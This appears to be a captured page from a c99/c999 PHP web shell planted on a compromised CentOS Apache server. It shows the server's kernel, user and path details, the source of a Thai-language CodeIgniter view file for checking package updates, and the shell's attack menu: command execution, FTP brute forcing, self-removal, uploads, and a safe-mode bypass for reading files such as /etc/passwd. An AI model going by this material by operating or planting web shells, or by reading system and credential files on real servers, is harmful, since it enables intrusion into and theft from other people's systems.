!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/cvc/application/views/version/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_chk_update.php (1.92 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div><h3>ตรวจสอบการอัพเดทแพคเกจ</h3></div>
<p>&nbsp;</p>
<table class="ver_table" style="width:90%;">
    <thead>
        <tr>
            <th>ลำดับที่</th>
            <th>เวอร์ชันแพคเกจ</th>
            <th>ชื่อระบบ</th>
            <th>ชื่อไฟล์</th>
            <th>ขนาดไฟล์ (KB)</th>
            <th>Path</th>
            <th>สถานะการอัพเดท</th>
        </tr>
    </thead>
    <tbody>
    <?php
        
if(isset($chk_upd))
        {
            
//$frm_url = site_url($this->config->item('ver_folder').'uploadversion').'/';
            
$i 1;
            
//$edit_title = $this->config->item('ver_title_edit');
            
$del_title $this->config->item('ver_title_del');
            foreach(
$chk_upd as $index =>$row){
            
//print_r($chk_upd);die;
    
?>
        <tr>
            <td class="ver_center"><?php echo $i++;?></td>
            <td><?php echo $row['pkg_version'];?></td>
            <td><?php echo $row['csys_th_name'];?></td>
            <td><?php echo $row['file_org_name'];?></td>
            <td align="center"><?php echo $row['file_size'];?></td>
            <td><?php echo $row['file_path'];?></td>
            <td class="ver_center">
            <?php
                
if($row['file_update_status'] == 'Y'){
                    echo 
"<img src=".base_url().'images/right.jpg'.">";
                } else {
                    echo 
form_open($this->config->item('ver_folder').'updateversion/install_pkg');?>
                    <input type= "hidden" name="pkg_id[]" value="<?php echo $row['file_pkg_id']; ?>" />
                    <input type= "submit" name="btnInstall" id="btnInstall" value="ลองใหม่" />
                <?php echo form_close();
                } 
?>
            </td>
        </tr>
    <?php
            
}
        }
        else
        {
    
?>
        <tr>
            <td class="ver_center" colspan="5"><span class="ver_error"><?php echo $this->config->item('ver_not_found');?></span></td>
        </tr>
    <?php
        
}
    
?>
    </tbody>
</table>
<p>&nbsp;</p>
<div align="center"><a href="<?php echo site_url().$this->config->item('ver_folder').'updateversion/chk_update'?>"><button>กลับสู่หน้าเริ่มต้น</button></a></div>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--